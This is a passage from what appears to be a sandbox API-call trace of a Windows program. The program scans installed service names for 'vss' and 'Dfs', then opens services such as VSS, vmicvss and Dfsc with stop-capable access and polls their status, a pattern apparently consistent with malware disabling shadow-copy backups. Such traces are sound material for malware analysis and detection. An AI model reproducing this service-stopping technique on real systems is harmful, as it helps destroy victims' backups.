(lpFirst="IRENUM", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="irmon", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="isapnp", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="iScsiPrt", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="kbdclass", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="kbdhid", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="kdnic", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="KeyIso", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="KSecDD", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="KSecPkg", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="ksthunk", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="KtmRm", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="LanmanServer", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="lfsvc", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="LicenseManager", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="lltdio", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="lltdsvc", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="lmhosts", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="LSI_SAS", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="LSI_SSS", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="LSM", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="luafv", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="MapsBroker", lpSrch="vss") returned 0x0 [0163.447] StrStrIA (lpFirst="mausbhost", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="mausbip", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="megasas", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="megasas2i", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="megasr", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="mlx4_bus", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="MMCSS", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="Modem", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="monitor", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="mouclass", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="mouhid", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="mountmgr", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="mpsdrv", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="MpsSvc", lpSrch="vss") returned 0x0 [0163.448] StrStrIA (lpFirst="MRxDAV", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="mrxsmb", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="mrxsmb10", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="mrxsmb20", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="MsBridge", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="MSDTC", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="Msfs", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="msgpiowin32", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="mshidkmdf", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="mshidumdf", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="msisadrv", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="MSiSCSI", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="msiserver", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="MSKSSRV", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="MsLldp", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="MSPCLOCK", lpSrch="vss") returned 0x0 [0163.449] StrStrIA (lpFirst="MSPQM", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="MsRPC", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="MsSecFlt", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="mssmbios", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="MSTEE", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="MTConfig", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="Mup", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="mvumis", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="NativeWifiP", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="NcaSvc", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="NcbService", lpSrch="vss") returned 0x0 [0163.450] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="vss") returned 0x0 [0163.452] OpenServiceA (hSCManager=0x3585850, lpServiceName="vmicvss", dwDesiredAccess=0x2c) returned 0x3585828 [0163.454] QueryServiceStatusEx (in: hService=0x3585828, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0163.454] CloseServiceHandle (hSCObject=0x3585828) returned 1 [0163.455] OpenServiceA (hSCManager=0x3585850, lpServiceName="VSS", dwDesiredAccess=0x2c) returned 0x3585828 [0163.456] QueryServiceStatusEx (in: hService=0x3585828, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0163.456] CloseServiceHandle (hSCObject=0x3585828) returned 1 [0163.853] OpenServiceA (hSCManager=0x3585850, lpServiceName="cdfs", dwDesiredAccess=0x2c) returned 0x3585d50 [0163.854] QueryServiceStatusEx (in: hService=0x3585d50, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0163.855] CloseServiceHandle (hSCObject=0x3585d50) returned 1 [0163.855] OpenServiceA (hSCManager=0x3585850, lpServiceName="Dfsc", dwDesiredAccess=0x2c) returned 0x3585ff8 [0163.856] QueryServiceStatusEx (in: hService=0x3585ff8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0163.857] Sleep (dwMilliseconds=0x3e8) [0165.098] QueryServiceStatusEx (in: hService=0x3585ff8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0165.100] GetTickCount () returned 0x116a06e [0165.100] CloseServiceHandle (hSCObject=0x3585ff8) returned 1 [0165.100] StrStrIA (lpFirst="Dhcp", lpSrch="Dfs") returned 0x0 [0165.100] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="Dfs") returned 0x0 [0165.100] StrStrIA (lpFirst="DiagTrack", lpSrch="Dfs") returned 0x0 [0165.100] StrStrIA (lpFirst="Disk", lpSrch="Dfs") returned 0x0 [0165.100] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="Dfs") returned 0x0 [0165.100] StrStrIA (lpFirst="dmvsc", lpSrch="Dfs") returned 0x0 [0165.100] StrStrIA (lpFirst="dmwappushservice", lpSrch="Dfs") returned 0x0 [0165.100] StrStrIA (lpFirst="Dnscache", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="DoSvc", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="dot3svc", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="DPS", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="drmkaud", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="DsmSvc", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="DsSvc", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="DusmSvc", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="DXGKrnl", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="e1iexpress", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="EapHost", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="ebdrv", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="EFS", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="EhStorClass", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="embeddedmode", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="EntAppSvc", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="ErrDev", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="EventLog", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="EventSystem", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="exfat", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="fastfat", lpSrch="Dfs") returned 0x0 [0165.101] StrStrIA (lpFirst="Fax", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="fdc", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="fdPHost", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="FDResPub", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="fhsvc", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="FileCrypt", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="FileInfo", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="Filetrace", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="flpydisk", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="FltMgr", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="FontCache", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="FrameServer", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="FsDepends", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="fvevol", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="gencounter", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="genericusbfn", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="GPIOClx0101", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="gpsvc", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="gupdate", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="gupdatem", lpSrch="Dfs") returned 0x0 [0165.102] StrStrIA (lpFirst="HdAudAddService", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="HDAudBus", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="HidBatt", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="HidBth", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="hidi2c", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="hidinterrupt", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="HidIr", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="hidserv", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="HidUsb", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="HomeGroupListener", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="HpSAMD", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="HTTP", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="HvHost", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="hvservice", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="hwpolicy", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="hyperkbd", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="i8042prt", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="iagpio", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="iai2c", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="Dfs") returned 0x0 [0165.103] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="iaStorAV", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="iaStorV", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="ibbus", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="icssvc", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="IKEEXT", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="IndirectKmd", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="intelide", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="intelpep", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="intelppm", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="iorate", lpSrch="Dfs") returned 0x0 [0165.104] StrStrIA (lpFirst="IpFilterDriver", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="iphlpsvc", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="IPMIDRV", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="IPNAT", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="irda", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="IRENUM", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="irmon", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="isapnp", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="iScsiPrt", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="kbdclass", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="kbdhid", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="kdnic", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="KeyIso", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="KSecDD", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="KSecPkg", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="ksthunk", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="KtmRm", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="LanmanServer", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="lfsvc", lpSrch="Dfs") returned 0x0 [0165.105] StrStrIA (lpFirst="LicenseManager", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="lltdio", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="lltdsvc", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="lmhosts", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="LSI_SAS", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="LSI_SSS", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="LSM", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="luafv", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="MapsBroker", lpSrch="Dfs") returned 0x0 [0165.106] StrStrIA (lpFirst="mausbhost", lpSrch="Dfs") returned 0x0 [0165.356] StrStrIA (lpFirst="mausbip", lpSrch="Dfs") returned 0x0 [0165.356] StrStrIA (lpFirst="megasas", lpSrch="Dfs") returned 0x0 [0165.356] StrStrIA (lpFirst="megasas2i", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="megasr", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="mlx4_bus", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="MMCSS", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="Modem", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="monitor", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="mouclass", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="mouhid", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="mountmgr", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="mpsdrv", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="MpsSvc", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="MRxDAV", lpSrch="Dfs") returned 0x0 [0165.357] StrStrIA (lpFirst="mrxsmb", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="mrxsmb10", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="mrxsmb20", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="MsBridge", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="MSDTC", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="Msfs", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="msgpiowin32", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="mshidkmdf", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="mshidumdf", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="msisadrv", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="MSiSCSI", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="msiserver", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="MSKSSRV", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="MsLldp", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="MSPCLOCK", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="MSPQM", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="MsRPC", lpSrch="Dfs") returned 0x0 [0165.358] StrStrIA (lpFirst="MsSecFlt", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="mssmbios", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="MSTEE", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="MTConfig", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="Mup", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="mvumis", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="NativeWifiP", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="NcaSvc", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="NcbService", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="ndfltr", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="NDIS", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="NdisCap", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="NdisImPlatform", lpSrch="Dfs") returned 0x0 [0165.359] StrStrIA (lpFirst="NdisTapi", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="Ndisuio", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="NdisVirtualBus", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="NdisWan", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="ndiswanlegacy", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="ndproxy", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="Ndu", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="NetAdapterCx", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="NetBIOS", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="NetBT", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="Netlogon", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="Netman", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="netprofm", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="NetSetupSvc", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="NetTcpPortSharing", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="netvsc", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="NgcCtnrSvc", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="NgcSvc", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="NlaSvc", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="Npfs", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="npsvctrig", lpSrch="Dfs") returned 0x0 [0165.360] StrStrIA (lpFirst="nsi", lpSrch="Dfs") returned 0x0 [0165.361] StrStrIA (lpFirst="nsiproxy", lpSrch="Dfs") returned 0x0 [0165.361] StrStrIA (lpFirst="NTFS", lpSrch="Dfs") returned 0x0 [0165.361] StrStrIA (lpFirst="Null", lpSrch="Dfs") returned 0x0 [0165.361] StrStrIA (lpFirst="nvdimmn", lpSrch="Dfs") returned 0x0 [0165.361] StrStrIA (lpFirst="nvraid", lpSrch="Dfs") returned 0x0 [0165.361] StrStrIA (lpFirst="nvstor", lpSrch="Dfs") returned 0x0 [0165.361] StrStrIA (lpFirst="ose64", lpSrch="Dfs") returned 0x0 [0165.361] StrStrIA (lpFirst="p2pimsvc", lpSrch="Dfs") returned 0x0 [0165.361] StrStrIA (lpFirst="p2psvc", lpSrch="Dfs") returned 0x0 [0165.361] StrStrIA (lpFirst="Parport", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="partmgr", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="PcaSvc", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="pci", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="pciide", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="pcmcia", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="pcw", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="pdc", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="PEAUTH", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="PeerDistSvc", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="percsas2i", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="percsas3i", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="PerfHost", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="PhoneSvc", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="pla", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="PlugPlay", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="pmem", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="PNRPAutoReg", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="PNRPsvc", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="PolicyAgent", lpSrch="Dfs") returned 0x0 [0165.362] StrStrIA (lpFirst="Power", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="PptpMiniport", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="PrintNotify", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="Processor", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="ProfSvc", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="Psched", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="QWAVE", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="QWAVEdrv", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="RasAcd", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="RasAgileVpn", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="RasAuto", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="Rasl2tp", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="RasMan", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="RasPppoe", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="RasSstp", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="rdbss", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="rdpbus", lpSrch="Dfs") returned 0x0 [0165.363] StrStrIA (lpFirst="RDPDR", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="RdpVideoMiniport", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="rdyboost", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="ReFS", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="ReFSv1", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="RemoteAccess", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="RemoteRegistry", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="RetailDemo", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="RmSvc", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="RpcEptMapper", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="RpcLocator", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="RpcSs", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="rspndr", lpSrch="Dfs") returned 0x0 [0165.364] StrStrIA (lpFirst="s3cap", lpSrch="Dfs") returned 0x0 [0165.365] OpenServiceA (hSCManager=0x3585850, lpServiceName="udfs", dwDesiredAccess=0x2c) returned 0x3585f80 [0165.366] QueryServiceStatusEx (in: hService=0x3585f80, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: 